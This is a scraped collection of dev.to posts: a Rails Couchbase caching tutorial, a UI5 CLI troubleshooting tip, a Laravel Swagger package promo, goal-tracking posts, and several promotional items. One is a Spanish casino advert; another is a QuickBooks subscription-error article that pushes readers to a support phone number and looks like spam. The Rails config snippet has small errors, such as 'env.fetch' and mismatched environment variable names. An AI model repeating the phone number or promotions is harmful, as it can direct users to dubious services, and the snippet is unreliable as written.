Visit our website to learn more and register for your workshop! | sahil_maharanawork_d572d |
1,899,160 | Rails Caching With Couchbase in Under 5 Minutes | Reduce your data sprawl and learn how to implement caching in a Rails application using Couchbase in under 5 minutes | 0 | 2024-06-24T17:35:41 | https://www.bengreenberg.dev/blog/blog_rails-caching-with-couchbase-in-under-5-minutes_1719187200000 | rails, tutorial, cache, couchbase | ---
title: Rails Caching With Couchbase in Under 5 Minutes
published: true
description: Reduce your data sprawl and learn how to implement caching in a Rails application using Couchbase in under 5 minutes
tags: rails, tutorial, cache, couchbase
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dsljn7699sl2xypflfmn.png
# Use a ratio of 100:42 for best results.
# published_at: 2024-06-24 16:17 +0000
canonical_url: https://www.bengreenberg.dev/blog/blog_rails-caching-with-couchbase-in-under-5-minutes_1719187200000
---
Every new Rails application when it is first deployed comes along with it several other services that are used to make it run smoothly and efficiently. As Rails developers we are all familiar with them: PostgreSQL, Redis, Sidekiq, etc.
**What if you could begin to reduce the sprawl of services that you need to run your application?**
In under 5 minutes, you can combine both your database and caching layer into a single service with Couchbase. Many people know Couchbase as a NoSQL database, but it can also be used as a caching service that can be used to store data in memory and reduce the number of queries that hit your database. By doing so, you can reduce the number of services that you need to run your application and make it more efficient.
Enough with the introduction, let's get started!
## Step 1: Create a Couchbase Capella Account
If you already have a Couchbase Capella account, you can skip this step and proceed right to Step 2. If you don't have an account, you can create one by visiting the [Couchbase Capella website](https://cloud.couchbase.com/). You can create an account using your GitHub or Google credentials, or you can create an account using your email address and a password.
Once you have done so, you will proceed to create a new project with a new database, and a new bucket. You can name your project, database, and bucket whatever you like. For the purposes of this tutorial, I will name my project `rails-couchbase-caching`, my database `rails-couchbase-caching`, and my bucket `cachingExampleWithRails`.
After you have created your project, database, and bucket, you will need to create database credentials. You can do so by clicking on the `Connect` button and then the `Database Access` link.

Make sure to take note of the username and password that you have created, and also the connection string that you will use to connect to your Couchbase database. You will be using them in the next step.
## Step 2: Add the Couchbase Gem to Your Rails Application
To add the Couchbase gem to your Rails application, you will need to add the following line to your `Gemfile`:
```ruby
gem "couchbase", "~> 3.5.1"
```
Then, run `bundle install` to install the gem.
At this point, make sure to add your Couchbase connection string, username, and password to your Rails application. You can do so by adding the following to your `.env` file or to however you manage your environment variables in your application:
```ruby
COUCHBASE_CONNECTION_STRING=your_connection_string
COUCHBASE_USER=your_username
COUCHBASE_PASSWORD=your_password
COUCHBASE_BUCKET_NAME=your_bucket_name
```
Now, you are ready to connect to your Couchbase database in your Rails application.
## Step 3: Implement Caching in Your Rails Application
To implement caching in your Rails application, you can use the following code snippet inside your `config/application.rb` file:
```ruby
config.cache_store = :couchbase_store, {
connection_string: env.fetch("COUCHBASE_CONNECTION_STRING"),
username: env.fetch("COUCHBASE_USER"),
password: env.fetch("COUCHBASE_PASSWORD"),
bucket: env.fetch("COUCHBASE_BUCKET"),
}
```
This code snippet will configure your Rails application to use Couchbase as the caching store. You can now use the `ActiveSupport::Cache` API to interact with your Couchbase cache as you would with any other caching store.
## Step 4: Use the Cache in Your Rails Application
To use the cache in your Rails application, you can use the following code snippet:
```ruby
@cached_data = Rails.cache.fetch("key", expires_in: 1.minute) do
# Your caching data here
end
```
This code snippet will cache the data that you have inside the block for 1 minute. After 1 minute, the data will be removed from the cache. The `#fetch` method will return the data if it is present in the cache, otherwise it will execute the block and store the data in the cache. The [Rails docs](https://api.rubyonrails.org/classes/ActiveSupport/Cache/Store.html) has more information on how to use the `ActiveSupport::Cache` API.
That's it! You have now implemented caching in your Rails application using Couchbase in under 5 minutes. You can now reduce the number of services that you need to run your application and make it more efficient.
## Wrapping Up
In this tutorial, you have learned how to implement caching in a Rails application using Couchbase in under 5 minutes. By doing so, you can reduce the number of services that you need to run your application and make it more efficient. You can now store data in memory and reduce the number of queries that hit your database.
The next time you deploy a Rails app and need a caching layer, you can remove at least one more service from your stack and consolidate your database and caching layer into a single service with Couchbase.
| bengreenberg |
1,899,192 | zsh: command not found ui5 tooling. | To solve the "zsh: command not found: ui5" error when using UI5 tools locally installed in your... | 0 | 2024-06-24T17:47:24 | https://dev.to/kiranuknow/zsh-command-not-found-ui5-tooling-3bgk | openui5, sapui5, mac, command | To solve the "zsh: command not found: ui5" error when using UI5 tools locally installed in your project's node_modules on a Mac, you can try the following approaches:
Use npx to run the UI5 CLI:
Instead of calling ui5 directly, use npx ui5. This will look for the UI5 CLI in your project's node_modules and execute it.
`npx ui5 <command>`
Use the full path to the UI5 CLI:
You can run the UI5 CLI by specifying its full path in the node_modules folder:
`./node_modules/.bin/ui5 <command>`
Add node_modules/.bin to your PATH:
You can temporarily add the node_modules/.bin directory to your PATH for the current session:
`export PATH=$PATH:./node_modules/.bin`
After running this command, you should be able to use ui5 directly in that terminal session.
Use npm scripts:
Define scripts in your package.json file that use the locally installed UI5 CLI:
```
{
"scripts": {
"start": "ui5 serve",
"build": "ui5 build"
}
}
```
Then you can run these scripts using npm:
```
npm run start
npm run build
```
| kiranuknow |
1,899,191 | Auto-Magic: Automate Your Laravel API Docs with G4T Swagger! | Supercharge Your Laravel Projects with Swagger: Introducing Laravel G4T Swagger Auto... | 0 | 2024-06-24T17:41:29 | https://dev.to/hussein_alaa_h/auto-magic-automate-your-laravel-api-docs-with-g4t-swagger-5fjd | laravel, documentation, swagger, webdev | Supercharge Your Laravel Projects with Swagger:

**Introducing Laravel G4T Swagger Auto Generate!**
**Hey, Laravel Devs! 🎉**
Ever thought, "Gee, I wish I had a magical unicorn to update my API documentation automatically"?
Well, say hello to _Laravel G4T Swagger Auto Generate_!
This package is like having a documentation fairy who loves Laravel as much as you do.
**So, What’s the Big Deal?**
Laravel G4T Swagger Auto Generate makes API documentation as easy as pie.
Imagine never having to update your docs again manually.
Sounds like a dream, right? With this package, it's a reality!
**Reasons to Fall in Love with This Package:**
1- Time Saver Extraordinaire: Automate your API docs and save precious hours.
2- Accuracy Guru: Automatically generated docs mean fewer mistakes. Hooray for accuracy!
3- Organizational Wizard: Keep your API documentation spick and span without lifting a finger.
**Getting Started: Easy Peasy Lemon Squeezy**
1- Install via Composer:
```
composer require g4t/swagger
```
2- After installing the package, publish the configuration file:
```
php artisan vendor:publish --provider "G4T\Swagger\SwaggerServiceProvider"
```
**Features That’ll Make You Go “Wow!”**
- Automatic Documentation: Swagger docs generated automagically for all your API endpoints.
- Customizable Configurations: Tailor the documentation to fit your specific needs.
- Seamless Integration: Fits right into your existing Laravel project like it was meant to be.
- Ability to change the theme.
**A Little Sneak Peek**
Picture this: You're coding like a rockstar, creating endpoints faster than a caffeinated squirrel.
Then, it hits you – the dreaded documentation update.
But wait! Your Swagger docs are up-to-date.
It's not just magic; it's Laravel G4T Swagger Auto Generate.
**Bonus Perks**
Impress your teammates with your sleek, always-updated API docs.
They might even give you an extra donut at the next meeting. 🍩
**Wrap-Up**
Laravel G4T Swagger Auto Generate isn't just a tool; it's your new best friend in API documentation.
Whether you're flying solo or part of a dream team, this package will keep your workflow smooth and
your docs sparkling.
Give it a try and watch the magic happen!
Dive in and explore more at the [Laravel G4T Swagger Auto Generate GitHub Repository](https://github.com/hussein4alaa/laravel-g4t-swagger-auto-generate). 🚀 | hussein_alaa_h |
1,899,188 | What are your goals for week 26 of the year? | It's week 26 of 2024. It's the middle of the year. Even though we view June as the middle of the... | 19,128 | 2024-06-24T17:36:32 | https://dev.to/jarvisscript/what-are-your-goals-for-week-26-of-the-year-4mf7 | discuss, motivation, productivity | It's week 26 of 2024. It's the middle of the year. Even though we view June as the middle of the year, the exact middle of the year is one week away on July 1.
Are you on track to meet your goals for the year?
## What are your goals for the week?
- What are you building?
- What will be a good result by week's end?
- What events are happening this week?
* any suggestions for in person or virtual events?
- Any special goals for the quarter?
{% embed https://dev.to/virtualcoffee/monthly-challenge-mid-year-check-in-recharge-and-refocus-for-an-amazing-second-half-2k4c %}
### Last Week's Goals
- [:white_check_mark:] Continue Job Search.
- [:white_check_mark:] Project work. worked on a React Habit tracker project.
- [:white_check_mark:] Blog. * Dev Challenge.
- [:white_check_mark:] DEV Has new Challenges need to work on the one Byte explainer. * I explained git in under 255 characters. Link is below.
- Events.
* [:white_check_mark:] React Native stream.
- [:white_check_mark:]Run a goal setting thread on Virtual Coffee Slack.
- [:x:] Assess my mid year progress. Did not do this.
{% embed https://dev.to/jarvisscript/dev-computer-science-challenge-2n8g %}
### This Week's Goals
- Continue Job Search.
- Project work.
- Blog.
- DEV Has new Challenges need to work on the one Byte explainer.
- Events.
* two different job panels on Wednesday.
- Run a goal setting thread on Virtual Coffee Slack.
### Your Goals for the week
Your turn what do you plan to do this week?
- What are you building?
- What will be a good result by week's end?
- What events are happening any week?
* in person or virtual?
- Got any Summer Plans?
```html
-$JarvisScript git commit -m "half way there."
``` | jarvisscript |
1,899,187 | Day 28 of my progress as a vue dev | About today Today I broke my personal record for working the most hours in a day and I'll tell you... | 0 | 2024-06-24T17:36:06 | https://dev.to/zain725342/day-28-of-my-progress-as-a-vue-dev-5b1m | webdev, vue, typescript, tailwindcss | **About today**
Today I broke my personal record for working the most hours in a day and I'll tell you one thing, you can't maintain a work life balance when you immerse yourself so deep into work. It is torturous and yet so rewarding and fulfilling. But, only when you receive positive results.
**What's next?**
I will complete my landing page and will focus on getting the portfolio website live as soon as possible.
**Improvements required**
There is one thing I would like to work on is the ability to use my time as efficiently as possible. I know I work better under pressure but doesn't mean I have to be under pressure to produce quality work each time.
Wish me luck! | zain725342 |
1,899,185 | Explorando Casino En Línea Hex: Tu Guía Completa para el Entretenimiento de Juegos de Azar | En la búsqueda de una experiencia emocionante y segura de juegos de azar en línea,... | 0 | 2024-06-24T17:34:58 | https://dev.to/isabellajimnz/explorando-casino-en-linea-hex-tu-guia-completa-para-el-entretenimiento-de-juegos-de-azar-20ok | En la búsqueda de una experiencia emocionante y segura de juegos de azar en línea, [Casinoenlineahex.com/](https://casinoenlineahex.com/) emerge como una opción destacada para jugadores en América Latina. Este portal dedicado ofrece una variedad impresionante de información y recursos sobre casinos en línea, adaptados específicamente para satisfacer las necesidades de los entusiastas del juego.
¿Qué Ofrece Casino En Línea Hex?
Casino En Línea Hex no solo proporciona reseñas detalladas y análisis imparciales de los principales casinos en línea, sino que también ofrece guías exhaustivas sobre una amplia gama de juegos de casino. Desde tragamonedas emocionantes hasta mesas de blackjack estratégicas y mesas de ruleta emocionantes, el sitio cubre todos los aspectos importantes para ayudar a los jugadores a tomar decisiones informadas y disfrutar al máximo su experiencia de juego.
Seguridad y Confianza
Uno de los aspectos más destacados de Casino En Línea Hex es su compromiso con la seguridad y la confianza del jugador. Todos los casinos recomendados en el sitio han sido meticulosamente evaluados para garantizar que cumplan con rigurosos estándares de seguridad y justicia. Esto proporciona a los jugadores la tranquilidad de saber que están participando en juegos justos y que sus transacciones están protegidas.
Variedad de Métodos de Pago
Además de ofrecer información sobre juegos y casinos, Casino En Línea Hex también destaca por su cobertura de métodos de pago accesibles para jugadores en América Latina. Desde tarjetas de crédito y débito hasta opciones de pago electrónico y criptomonedas, el sitio asegura que los jugadores puedan realizar transacciones de manera conveniente y segura.
Promociones y Bonificaciones
Otro punto fuerte de Casino En Línea Hex son las promociones y bonificaciones exclusivas que ofrece. El sitio mantiene a los jugadores actualizados sobre las últimas ofertas de bienvenida, bonos de depósito, giros gratis y más. Estas promociones pueden mejorar significativamente la experiencia de juego y aumentar las posibilidades de ganar premios en efectivo.
Accesibilidad y Soporte al Cliente
Casino En Línea Hex se esfuerza por garantizar que los jugadores tengan acceso fácil a la información que necesitan. El sitio está diseñado para ser intuitivo y fácil de navegar, con secciones claras que cubren todo, desde cómo empezar hasta cómo resolver problemas comunes. Además, el equipo de soporte al cliente está disponible para ayudar en cualquier momento, ofreciendo asistencia en varios idiomas para satisfacer las necesidades de una audiencia diversa.
En resumen, Casino En Línea Hex es más que un simple directorio de casinos en línea; es un recurso invaluable para cualquier persona interesada en explorar el emocionante mundo de los juegos de azar en Internet. Con su compromiso con la seguridad, la variedad de juegos, la accesibilidad de los métodos de pago y las promociones atractivas, este sitio se destaca como un líder en la industria del entretenimiento en línea.
| isabellajimnz | |
1,899,184 | Sorry We Need To Verify Your Subscription: Here’s What to Do | Sorry We Need to Verify Your Subscription is a message typically displayed by software providers,... | 0 | 2024-06-24T17:32:58 | https://dev.to/jeafwillson/sorry-we-need-to-verify-your-subscription-heres-what-to-do-37k9 | productivity, quickbooks, quickbookssolutions, discuss | Sorry We Need to Verify Your Subscription is a message typically displayed by software providers, including QuickBooks, when there are
issues validating the user's subscription status. This message can appear during software activation or when attempting to access subscription-based features. Verification may be required due to various reasons, such as expired subscriptions, payment issues, or changes in licensing terms. Users are prompted to provide additional information or follow specific steps to verify their subscription, which may involve updating payment details, renewing the subscription,
or contacting customer support for assistance.
> Verifying the subscription ensures compliance with licensing agreements and grants access to the full range of features and services included in the subscription package. Call our experts at **+1(855)-738-0359** for any help.

## Why is a subscription issue occurring on QB Desktop?
Resolving this issue often involves addressing the specific cause, such as renewing subscriptions, and updating payment information.
- If the subscription period has ended, verification is required before accessing subscription-based features.
- Failed or declined payments can result in subscription verification prompts.
- Updates in software licensing agreements may necessitate re-verification of subscriptions.
- Issues with user account authentication or verification processes can trigger this message.
- Occasionally, technical issues or software bugs may erroneously prompt subscription verification requests.
- Subscription verification may be part of security protocols to prevent unauthorized access to subscription services.
**Read Also: How To Fix Error: [Sorry We Need To Verify Your Subscription Before Installing & Updating QuickBooks](https://asquarecloudhosting.com/fix-error-sorry-we-need-to-verify-your-subscription-before-updating-quickbooks/)**
## Solution that can seriously help in getting rid of the problem once and for all
Installing QuickBooks Desktop software in Safe Mode may be necessary if you encounter issues during the installation process due to conflicting programs or system settings.

### Solution: Try to install the QB desktop application using the safe mode
By following these steps, you can install QuickBooks Desktop software in Safe Mode, allowing you to troubleshoot installation issues caused by conflicting programs or system settings. After installation, you can restart your computer to exit Safe Mode and use QuickBooks normally.
- Select "Safe Mode" from the menu using the arrow keys on your keyboard and press "Enter" to boot into Safe Mode. If prompted, log in with an administrator account.
- Ensure you have the QuickBooks installation CD or downloaded setup file ready. Navigate to the location of the QuickBooks setup file or insert the installation CD into your computer. The QuickBooks installation wizard will appear.
- Accept the license agreement and choose the installation type (Typical, Custom, or Network). Select the destination folder for QuickBooks installation or use the default location.
- Continue through the installation wizard, providing any necessary information, such as license and product details. Click "Install" to begin the installation process. QuickBooks will now install in Safe Mode.
**Recommended to Read :[WHY DOES QUICKBOOKS KEEP CLOSING](https://asquarecloudhosting.com/quickbooks-closes-unexpectedly-error/)**

**Conclusion**
Sorry We Need to Verify Your Subscription indicates a requirement for validating subscription status. Users may encounter this message for various reasons, such as expired subscriptions or payment issues. Resolving it typically involves updating payment details or contacting customer support for assistance. Just speak with our team at **+1(855)-738-0359** and get help if you need it.
**Visit URL : [https://dev.to/jeafwillson](dev.to)**
| jeafwillson |
1,899,183 | Automotive Software Development Guide | In 2024, automotive software development is driven by key trends such as autonomous driving,... | 0 | 2024-06-24T17:24:44 | https://dev.to/technbrains/automotive-software-development-guide-48g | In 2024, automotive software development is driven by key trends such as autonomous driving, connected vehicles, and electric vehicle technology. Best practices include robust cybersecurity measures, agile development methodologies, and user-centric design. The future will see further innovations in AI, IoT integration, and battery management for electric vehicles, shaping the next generation of car software.
For more details, visit: [https://www.technbrains.com/blog/automotive-software-development-guide/](https://www.technbrains.com/blog/automotive-software-development-guide/) | martindye | |
1,899,182 | Digi different | Digi different gives you educational information to make yourself knowledgeable and updated in this... | 0 | 2024-06-24T17:21:17 | https://dev.to/digidifferent/digi-different-3elo | digidifferent | [Digi different](https://digidifferent.com/) gives you educational information to make yourself knowledgeable and updated in this era. | digidifferent |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.